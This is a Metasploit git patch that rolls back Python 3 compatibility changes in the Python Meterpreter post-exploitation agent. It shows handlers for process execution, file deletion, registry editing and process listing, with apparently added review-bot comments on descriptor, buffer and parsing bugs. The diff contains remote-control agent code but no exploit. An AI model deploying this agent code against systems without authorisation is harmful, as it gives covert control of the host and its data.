a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll index d1db92c52b46a4213738d4e63b0b47a9b6837bf2..4856014f718e03894cd454df30fb638b039c82f3 100755 GIT binary patch delta 89 zcmZqJVBN66dcp^0{`(Uqe)eTD6KQs0Y<FS=VJ0AE24WT<W(8t4AZ7<*4j|?PVlE)& a-tNT6BcuS*-X5;V1H`=B!xi~fZUX?iMHv?W delta 89 zcmZqJVBN66dcp_hh5tGxe)eVZ3~qK}Y<FS=VJ0AE24WT<W(8t4AZ7<*4j|?PVlE)& c-tNT6Bc#B*;9p03xFQb_^KK7U<XgE701;6dx&QzG diff --git a/data/meterpreter/metsrv.x86.dll b/data/meterpreter/metsrv.x86.dll index 65ff54d2cee9954a85519ed8fa45b7106ac3b53d..63d44bf6cd755a852a3aa8da6dd90ccf8d15e3e6 100755 GIT binary patch delta 79 zcmZo@&~Iqa-@w7hJni0u$=r;-Om8ilqZr$x7(ti`h?#+y1&CRJm<@>8ftUk`Ik!hK Ua%C}r^tB&n=GuOoncH#?0JQrTn*aa+ delta 79 zcmZo@&~Iqa-@w7h9Q3baGB=|yQ)p##6k~f7BM37AF*6Xe05K~NvjH(X5OV-A=k_Q@ Ut}G^yzV_qHT-%Q`b6f5K0FjFp>i_@% 
diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll index 0958c1e931418c2d6c1397834cd78e3424366043..861df56a583f84d9adc81281ca0719feb697a389 100755 GIT binary patch delta 42 wcmZqJz|*jSX8|L#*8K^SnHhbVvR5<*F}4RWGHwrIWLk6)B)<LoB_>W+06u{aO8@`> delta 42 wcmZqJz|*jSX8|MghJPKCnHhbV(w{d6F}4RWGHwrIWLk6)B)<LoB_>W+09~mNzyJUM diff --git a/data/meterpreter/screenshot.x86.dll b/data/meterpreter/screenshot.x86.dll index 93bf2e177823e083281c34b21c67c1ae336b29a4..597c07099ebf265979988d30934f066176b535f4 100755 GIT binary patch delta 43 xcmZqJz|*jSX8|Mg#(NVcGc)=!yBuY14rXi*W@OwR%*ZtHIY?sr^A}8#`T$#I5Lo~K delta 43 xcmZqJz|*jSX8|K~(!Y+$%#6Ow(^y!VgBja{85y?+Gcrwl4wBgZ`~{PwJ^)9Y4}Aat From 97a70e49c8159c7c3d095e02e31ceb6b3bcc608b Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Thu, 5 Jun 2014 17:31:02 -0500 Subject: [PATCH 498/853] Roll back the jar/py changes --- data/meterpreter/ext_server_stdapi.jar | Bin 38782 -> 38782 bytes data/meterpreter/ext_server_stdapi.py | 121 ++++++---------- data/meterpreter/meterpreter.jar | Bin 24427 -> 24427 bytes data/meterpreter/meterpreter.py | 184 ++++++++++--------------- 4 files changed, 111 insertions(+), 194 deletions(-) diff --git a/data/meterpreter/ext_server_stdapi.jar b/data/meterpreter/ext_server_stdapi.jar index b6a01cac095c0f8e799987555ea70dea3ae1b18e..bef5cee0140fd78c4db9c9ac32eb29b3d7778bc5 100644 GIT binary patch delta 174 zcmV;f08#(`t^)q90+2NXG)|x%kvT7afY4nlZp4Bsw=y&%4Yo;0rXO!_YZ2W%=6&YP zROsx366+hqWWCGP1~Mti-nK@c&2!-g$nM+CDzYwLxf;h2I$}(r^_HRbofOAN$Yef# z5wLDZRXC7SJIG)!#c5)4%L#q)Xej1tUi)vEM~WdX2#E~_3u{t}BG!!^DE__+ytXv; cNqr3|q<909K>-@G3<2<g1T;>d9<qae6sf{Z*8l(j delta 174 zcmV;f08#(`t^)q90+2NX8;47DkvT7apwL|vH)6q+TN#>>2HPY|(vP>dwTNyW^FH%t zN_6%?G3gs|wBF@v1(_6w&NfD$&2#2E$nNX?A|`!!<!TrPXenU~jkgIZ-%4?0!bIld z7Xho9REa$~wSf$_Qk=#_Za$$e9u0A>rnUc;X(SFjBgAAdSXh!$6kOG|C;oj4d2MLy cqWT(ANbv@fK>-@G3<2<g1RIA-bh3kf6pHCi8~^|S 
diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index ed7e58701a..ae9cab6cb8 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -48,24 +48,6 @@ try: except ImportError: has_winreg = False -try: - import winreg - has_winreg = True -except ImportError: - has_winreg = (has_winreg or False) - -if sys.version_info[0] < 3: - is_str = lambda obj: issubclass(obj.__class__, str) - is_bytes = lambda obj: issubclass(obj.__class__, str) - bytes = lambda *args: str(*args[:1]) - NULL_BYTE = '\x00' -else: - is_str = lambda obj: issubclass(obj.__class__, __builtins__['str']) - is_bytes = lambda obj: issubclass(obj.__class__, bytes) - str = lambda x: __builtins__['str'](x, 'UTF-8') - NULL_BYTE = bytes('\x00', 'UTF-8') - long = int - if has_ctypes: # # Windows Structures @@ -516,12 +498,11 @@ def get_stat_buffer(path): blocks = si.st_blocks st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink) st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev) - st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime)) + st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime) st_buf += struct.pack('<II', blksize, blocks) return st_buf def netlink_request(req_type): - import select # See RFC 3549 NLM_F_REQUEST = 0x0001 NLM_F_ROOT = 0x0100 
@@ -532,25 +513,17 @@ def netlink_request(req_type): sock.bind((os.getpid(), 0)) seq = int(time.time()) nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC) - sock.send(nlmsg) + sfd = os.fdopen(sock.fileno(), 'w+b') + sfd.write(nlmsg) responses = [] - if not len(select.select([sock.fileno()], [], [], 0.5)[0]): - return responses - raw_response_data = sock.recv(0xfffff) - response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)]) - raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):] + response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR))) while response.type != NLMSG_DONE: if response.type == NLMSG_ERROR: break - response_data = raw_response_data[:(response.len - 16)] + response_data = sfd.read(response.len - 16) responses.append(response_data) - raw_response_data = raw_response_data[len(response_data):] - if not len(raw_response_data): - if not len(select.select([sock.fileno()], [], [], 0.5)[0]): - break - raw_response_data = sock.recv(0xfffff) - response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)]) - raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):] + response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR))) + sfd.close() sock.close() return responses @@ -586,7 +559,7 @@ def channel_open_stdapi_fs_file(request, response): else: fmode = 'rb' file_h = open(fpath, fmode) - channel_id = meterpreter.add_channel(MeterpreterFile(file_h)) + channel_id = meterpreter.add_channel(file_h) response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id) return ERROR_SUCCESS, response 
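Review bot: The reinstated `os.fdopen(sock.fileno(), 'w+b')` in netlink_request shares the socket's descriptor, so `sfd.close()` followed by `sock.close()` closes the same fd twice; in a threaded process the second close can land on a descriptor that was reused in between. `os.fdopen(os.dup(sock.fileno()), 'w+b')` gives the file object its own descriptor. The buffered `sfd.write(nlmsg)` is not visibly flushed before the first `sfd.read(...)`, and the reads block without the timeout the removed `select` call provided. The start of netlink_request is outside this hunk.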
@@ -702,7 +675,6 @@ def stdapi_sys_process_execute(request, response): proc_h.stderr = open(os.devnull, 'rb') else: proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - proc_h.echo_protection = True proc_h.start() else: proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) @@ -721,15 +693,15 @@ def stdapi_sys_process_getpid(request, response): def stdapi_sys_process_get_processes_via_proc(request, response): for pid in os.listdir('/proc'): - pgroup = bytes() + pgroup = '' if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit(): continue - cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb') - cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8'))) - status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read()) + cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ') + status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read() status_data = map(lambda x: x.split('\t',1), status_data.split('\n')) + status_data = filter(lambda x: len(x) == 2, status_data) status = {} - for k, v in filter(lambda x: len(x) == 2, status_data): + for k, v in status_data: status[k[:-1]] = v.strip() ppid = status.get('PPid') uid = status.get('Uid').split('\t', 1)[0] 
@@ -753,14 +725,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response): def stdapi_sys_process_get_processes_via_ps(request, response): ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command'] proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - ps_output = str(proc_h.stdout.read()) + ps_output = proc_h.stdout.read() ps_output = ps_output.split('\n') ps_output.pop(0) for process in ps_output: process = process.split() if len(process) < 4: break - pgroup = bytes() + pgroup = '' pgroup += tlv_pack(TLV_TYPE_PID, int(process[0])) pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1])) pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2]) @@ -821,7 +793,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response): use = ctypes.c_ulong() use.value = 0 ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use)) - complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username)) + complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username) k32.CloseHandle(tkn_h) parch = windll_GetNativeSystemInfo() is_wow64 = ctypes.c_ubyte() @@ -830,7 +802,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response): if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)): if is_wow64.value: parch = PROCESS_ARCH_X86 - pgroup = bytes() + pgroup = '' pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID) pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID) pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username) 
@@ -878,18 +850,16 @@ def stdapi_fs_delete_dir(request, response): @meterpreter.register_function def stdapi_fs_delete_file(request, response): file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] - if os.path.exists(file_path): - os.unlink(file_path) + os.unlink(file_path) return ERROR_SUCCESS, response @meterpreter.register_function def stdapi_fs_file_expand_path(request, response): path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] if has_windll: - path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8')) path_out = (ctypes.c_char * 4096)() - path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out)) - result = str(ctypes.string_at(path_out)) + path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out)) + result = ''.join(path_out)[:path_out_len] elif path_tlv == '%COMSPEC%': result = '/bin/sh' elif path_tlv in ['%TEMP%', '%TMP%']: @@ -942,8 +912,7 @@ def stdapi_fs_md5(request, response): @meterpreter.register_function def stdapi_fs_mkdir(request, response): dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value'] - if not os.path.isdir(dir_path): - os.mkdir(dir_path) + os.mkdir(dir_path) return ERROR_SUCCESS, response @meterpreter.register_function @@ -996,7 +965,7 @@ def stdapi_fs_stat(request, response): @meterpreter.register_function def stdapi_net_config_get_interfaces(request, response): - if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'): + if hasattr(socket, 'AF_NETLINK'): interfaces = stdapi_net_config_get_interfaces_via_netlink() elif has_osxsc: interfaces = stdapi_net_config_get_interfaces_via_osxsc() 
@@ -1005,7 +974,7 @@ def stdapi_net_config_get_interfaces(request, response): else: return ERROR_FAILURE, response for iface_info in interfaces: - iface_tlv = bytes() + iface_tlv = '' iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown')) iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00')) if 'mtu' in iface_info: @@ -1033,7 +1002,7 @@ def stdapi_net_config_get_interfaces_via_netlink(): 0x0100: 'PROMISC', 0x1000: 'MULTICAST' } - iface_flags_sorted = list(iface_flags.keys()) + iface_flags_sorted = iface_flags.keys() # Dictionaries don't maintain order iface_flags_sorted.sort() interfaces = {} @@ -1137,7 +1106,7 @@ def stdapi_net_config_get_interfaces_via_osxsc(): hw_addr = hw_addr.replace(':', '') hw_addr = hw_addr.decode('hex') iface_info['hw_addr'] = hw_addr - ifnames = list(interfaces.keys()) + ifnames = interfaces.keys() ifnames.sort() for iface_name, iface_info in interfaces.items(): iface_info['index'] = ifnames.index(iface_name) @@ -1169,10 +1138,7 @@ def stdapi_net_config_get_interfaces_via_windll(): iface_info['index'] = AdapterAddresses.u.s.IfIndex if AdapterAddresses.PhysicalAddressLength: iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength) - iface_desc = ctypes.wstring_at(AdapterAddresses.Description) - if not is_str(iface_desc): - iface_desc = str(iface_desc) - iface_info['name'] = iface_desc + iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description)) iface_info['mtu'] = AdapterAddresses.Mtu pUniAddr = AdapterAddresses.FirstUnicastAddress while pUniAddr: 
@@ -1208,7 +1174,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib():
 table_data = ctypes.string_at(table, pdwSize.value)
 entries = struct.unpack('I', table_data[:4])[0]
 table_data = table_data[4:]
- for i in range(entries):
+ for i in xrange(entries):
 addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
 ifrow = MIB_IFROW()
 ifrow.dwIndex = addrrow.dwIndex
@@ -1278,10 +1244,9 @@ def stdapi_registry_close_key(request, response):
 def stdapi_registry_create_key(request, response):
 root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
- base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
 permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
 res_key = ctypes.c_void_p()
- if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
+ if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
 response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
 return ERROR_SUCCESS, response
 return ERROR_FAILURE, response
@@ -1290,20 +1255,18 @@ def stdapi_registry_create_key(request, response): def stdapi_registry_delete_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] - base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value'] if (flags & DELETE_KEY_FLAG_RECURSIVE): - result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key)) + result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key) else: - result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key)) + result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key) return result, response @meterpreter.register_function_windll def stdapi_registry_delete_value(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] - value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) - result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name)) + result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name) return result, response @meterpreter.register_function_windll 
@@ -1372,10 +1335,9 @@ def stdapi_registry_load_key(request, response):
 def stdapi_registry_open_key(request, response):
 root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
- base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
 permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
 handle_id = ctypes.c_void_p()
- if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
+ if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
 response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
 return ERROR_SUCCESS, response
 return ERROR_FAILURE, response
@@ -1405,26 +1367,24 @@ def stdapi_registry_query_class(request, response): @meterpreter.register_function_windll def stdapi_registry_query_value(request, response): + REG_SZ = 1 + REG_DWORD = 4 hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] - value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) value_type = ctypes.c_uint32() value_type.value = 0 value_data = (ctypes.c_ubyte * 4096)() value_data_sz = ctypes.c_uint32() value_data_sz.value = ctypes.sizeof(value_data) - result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz)) + result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz)) if result == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value) - if value_type.value == winreg.REG_SZ: - response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE) - elif value_type.value == winreg.REG_DWORD: + if value_type.value == REG_SZ: + response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00') + elif value_type.value == REG_DWORD: value = value_data[:4] value.reverse() - if sys.version_info[0] < 3: - value = ''.join(map(chr, value)) - else: - value = bytes(value) + value = ''.join(map(chr, value)) response += tlv_pack(TLV_TYPE_VALUE_DATA, value) else: response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value)) 
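Review bot: In the `REG_SZ` branch, `ctypes.string_at(value_data)` is called without a length, so it reads up to the first NUL byte instead of stopping at the size the API reported in `value_data_sz`. Registry string data is not guaranteed to be NUL-terminated, and a value that fills the 4096-byte buffer would let the read run past it. Bounding the call keeps it inside the buffer: `ctypes.string_at(value_data, value_data_sz.value).split('\x00', 1)[0] + '\x00'`. The locals `REG_SZ = 1` and `REG_DWORD = 4` would read better as module-level constants with a comment naming the Windows registry types they mirror. The function body continues past the end of this hunk.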
@@ -1435,10 +1395,9 @@ def stdapi_registry_query_value(request, response): def stdapi_registry_set_value(request, response): hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] - value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value'] value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value'] - result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data)) + result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data)) return result, response @meterpreter.register_function_windll diff --git a/data/meterpreter/meterpreter.jar b/data/meterpreter/meterpreter.jar index 6754a37228bb55a53ba3ba32d1d8bea8822755a9..06d20d28ab38d721c974cdae288163d6997fab73 100644 GIT binary patch delta 36 pcmaF8kMZ?B#tEh@UbEf_O|*1o{mS#GmuF)mZx~o)^Q5qw8~`XE4~YN( delta 36 pcmaF8kMZ?B#tEh@F(=bQCR#ePe&Ko4duC%JZx~o)^Q5qw8~`%z5I_I` diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 7ed0222f35..979ebb4107 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -1,5 +1,12 @@ #!/usr/bin/python import code +try: + import ctypes +except: + has_windll = False +else: + has_windll = hasattr(ctypes, 'windll') + import os import random import select 
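Review bot: The bare `except:` around `import ctypes` in the `meterpreter.py` hunk catches every exception, including `KeyboardInterrupt` and `SystemExit`, where only a failed import is meant. `except ImportError:` states the intent and lets anything else surface. When the import fails the name `ctypes` stays undefined, so every later use depends on `has_windll` being checked first; a one-line comment above the `try` saying so would help the next reader.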
@@ -8,30 +15,10 @@ import struct import subprocess import sys import threading -import time -import traceback - -try: - import ctypes -except ImportError: - has_windll = False -else: - has_windll = hasattr(ctypes, 'windll') - -if sys.version_info[0] < 3: - is_bytes = lambda obj: issubclass(obj.__class__, str) - bytes = lambda *args: str(*args[:1]) - NULL_BYTE = '\x00' -else: - is_bytes = lambda obj: issubclass(obj.__class__, bytes) - str = lambda x: __builtins__['str'](x, 'UTF-8') - NULL_BYTE = bytes('\x00', 'UTF-8') # # Constants # -DEBUGGING = False - PACKET_TYPE_REQUEST = 0 PACKET_TYPE_RESPONSE = 1 PACKET_TYPE_PLAIN_REQUEST = 10 @@ -113,7 +100,6 @@ TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502 TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503 EXPORTED_SYMBOLS = {} -EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING def export(symbol): EXPORTED_SYMBOLS[symbol.__name__] = symbol @@ -121,7 +107,7 @@ def export(symbol): def generate_request_id(): chars = 'abcdefghijklmnopqrstuvwxyz' - return ''.join(random.choice(chars) for x in range(32)) + return ''.join(random.choice(chars) for x in xrange(32)) @export def inet_pton(family, address): 
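Review bot: `xrange` in `generate_request_id` exists only on Python 2, and the hunk above it removes the `sys.version_info` shim (`is_bytes`, `bytes`, `NULL_BYTE`), so after this change the file appears to run on Python 2 only. The same holds for `isinstance(channel, file)` in the channel handlers and for `except Exception, err:` in the dispatcher further down, the latter being a syntax error on Python 3. If that restriction is intended, a comment at the top of the file should say so. Otherwise `range(32)` is enough here, since a 32-item loop gains nothing from `xrange`.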
@@ -139,6 +125,25 @@ def inet_pton(family, address): return ''.join(map(chr, lpAddress[8:24])) raise Exception('no suitable inet_pton functionality is available') +@export +def packet_get_tlv(pkt, tlv_type): + offset = 0 + while (offset < len(pkt)): + tlv = struct.unpack('>II', pkt[offset:offset+8]) + if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type: + val = pkt[offset+8:(offset+8+(tlv[0] - 8))] + if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: + val = val.split('\x00', 1)[0] + elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: + val = struct.unpack('>I', val)[0] + elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: + val = bool(struct.unpack('b', val)[0]) + elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: + pass + return {'type':tlv[1], 'length':tlv[0], 'value':val} + offset += tlv[0] + return {} + @export def packet_enum_tlvs(pkt, tlv_type = None): offset = 0 @@ -147,7 +152,7 @@ def packet_enum_tlvs(pkt, tlv_type = None): if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type): val = pkt[offset+8:(offset+8+(tlv[0] - 8))] if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - val = str(val.split(NULL_BYTE, 1)[0]) + val = val.split('\x00', 1)[0] elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: val = struct.unpack('>I', val)[0] elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: @@ -158,14 +163,6 @@ def packet_enum_tlvs(pkt, tlv_type = None): offset += tlv[0] raise StopIteration() -@export -def packet_get_tlv(pkt, tlv_type): - try: - tlv = list(packet_enum_tlvs(pkt, tlv_type))[0] - except IndexError: - return {} - return tlv - @export def tlv_pack(*args): if len(args) == 2: 
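Review bot: The new `packet_get_tlv` loop trusts the length field read from the packet. A TLV whose length is 0 and whose type does not match leaves `offset` unchanged, so the `while` never ends, and fewer than 8 bytes left at `offset` makes `struct.unpack('>II', ...)` raise `struct.error`. Two guards let malformed input fall through to `return {}`: `if len(pkt) - offset < 8: break` before the unpack, and `if tlv[0] < 8 or tlv[0] > len(pkt) - offset: break` after it. `packet_enum_tlvs` in the next hunk advances with the same `offset += tlv[0]`, though its loop header is outside the hunk, so it likely needs the same check.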
@@ -173,33 +170,20 @@ def tlv_pack(*args): else: tlv = args[0] data = "" - if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: + if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: + data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00' + elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: data = struct.pack('>III', 12, tlv['type'], tlv['value']) elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: - data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8') - else: - value = tlv['value'] - if not is_bytes(value): - value = bytes(value, 'UTF-8') - if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE - elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: - data = struct.pack('>II', 8 + len(value), tlv['type']) + value - elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: - data = struct.pack('>II', 8 + len(value), tlv['type']) + value - elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: - data = struct.pack('>II', 8 + len(value), tlv['type']) + value + data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value']))) + elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: + data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] + elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: + data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] + elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: + data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] return data -#@export -class MeterpreterFile(object): - def __init__(self, file_obj): - self.file_obj = file_obj - - def __getattr__(self, name): - return getattr(self.file_obj, name) -export(MeterpreterFile) - #@export class MeterpreterSocket(object): def __init__(self, sock): 
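Review bot: The `RAW`, `GROUP` and `COMPLEX` branches of `tlv_pack` build exactly the same bytes, so they can share one branch, and a type that matches none of the six tests returns the initial empty `data` with no signal to the caller. The string branch now concatenates `tlv['value']` directly, so a value that is not already a byte string raises inside `tlv_pack` where the removed code coerced it first. A short docstring stating which value type each meta type expects, and a final `else` that raises `ValueError`, would make both cases explicit. The start of `tlv_pack` is outside this hunk.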
@@ -224,11 +208,11 @@ class STDProcessBuffer(threading.Thread): threading.Thread.__init__(self) self.std = std self.is_alive = is_alive - self.data = bytes() + self.data = '' self.data_lock = threading.RLock() def run(self): - for byte in iter(lambda: self.std.read(1), bytes()): + for byte in iter(lambda: self.std.read(1), ''): self.data_lock.acquire() self.data += byte self.data_lock.release() @@ -236,20 +220,15 @@ class STDProcessBuffer(threading.Thread): def is_read_ready(self): return len(self.data) != 0 - def peek(self, l = None): - data = bytes() + def read(self, l = None): + data = '' self.data_lock.acquire() if l == None: data = self.data + self.data = '' else: data = self.data[0:l] - self.data_lock.release() - return data - - def read(self, l = None): - self.data_lock.acquire() - data = self.peek(l) - self.data = self.data[len(data):] + self.data = self.data[l:] self.data_lock.release() return data @@ -257,25 +236,12 @@ class STDProcessBuffer(threading.Thread): class STDProcess(subprocess.Popen): def __init__(self, *args, **kwargs): subprocess.Popen.__init__(self, *args, **kwargs) - self.echo_protection = False def start(self): self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None) self.stdout_reader.start() self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None) self.stderr_reader.start() - - def write(self, channel_data): - self.stdin.write(channel_data) - self.stdin.flush() - if self.echo_protection: - end_time = time.time() + 0.5 - out_data = bytes() - while (time.time() < end_time) and (out_data != channel_data): - if self.stdout_reader.is_read_ready(): - out_data = self.stdout_reader.peek(len(channel_data)) - if out_data == channel_data: - self.stdout_reader.read(len(channel_data)) export(STDProcess) class PythonMeterpreter(object): 
